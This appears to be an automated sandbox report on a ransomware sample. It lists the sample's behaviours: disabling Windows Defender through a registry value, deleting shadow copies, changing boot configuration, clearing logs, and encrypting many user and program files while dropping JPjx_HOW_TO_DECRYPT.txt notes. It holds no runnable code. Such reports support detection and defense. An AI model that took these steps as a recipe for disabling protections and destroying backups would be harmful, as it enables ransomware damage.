Analysis Overview
SHA256
29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35
Threat Level: Known bad
The file 29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Hive
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Runs ping.exe
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-04 13:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-04 13:56
Reported
2022-03-04 13:58
Platform
win7-20220223-en
Max time kernel
4294183s
Max time network
136s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ResumePublish.raw => C:\Users\Admin\Pictures\ResumePublish.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\LimitEnter.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RestoreNew.raw => C:\Users\Admin\Pictures\RestoreNew.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MergeExpand.tiff => C:\Users\Admin\Pictures\MergeExpand.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\TraceJoin.png => C:\Users\Admin\Pictures\TraceJoin.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\TraceJoin.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InitializeWatch.png => C:\Users\Admin\Pictures\InitializeWatch.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutWatch.crw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RestoreNew.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SplitSkip.tiff => C:\Users\Admin\Pictures\SplitSkip.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SplitUnlock.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OpenStart.tif => C:\Users\Admin\Pictures\OpenStart.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutWatch.crw => C:\Users\Admin\Pictures\OutWatch.crw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MergeExpand.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResumePublish.raw.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SplitSkip.tiff.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\LimitEnter.png => C:\Users\Admin\Pictures\LimitEnter.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InitializeWatch.png.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenStart.tif.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\InstallDisconnect.vb.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46F.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\CharSetTable.chr.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0212957.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200611.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Australia\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\TextConv\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime.css.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\ChkrRes.dll.mui.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Angles.thmx.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SATIN\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\THMBNAIL.PNG.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00405_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00494_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02097_.GIF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_IAAAACAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\JPjx_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\directshowtap.ax | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00202_.WMF.vrpsFFF1eWTusGB7TTIYumA7aIpvVysH5VIPkHFVz8n_AAAAAAAAAAA0.3w1gm | C:\Users\Admin\AppData\Local\Temp\29d2f9308947efac0c804497666e1f03d61bc9321fdb498152a5d481d1e61a35.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
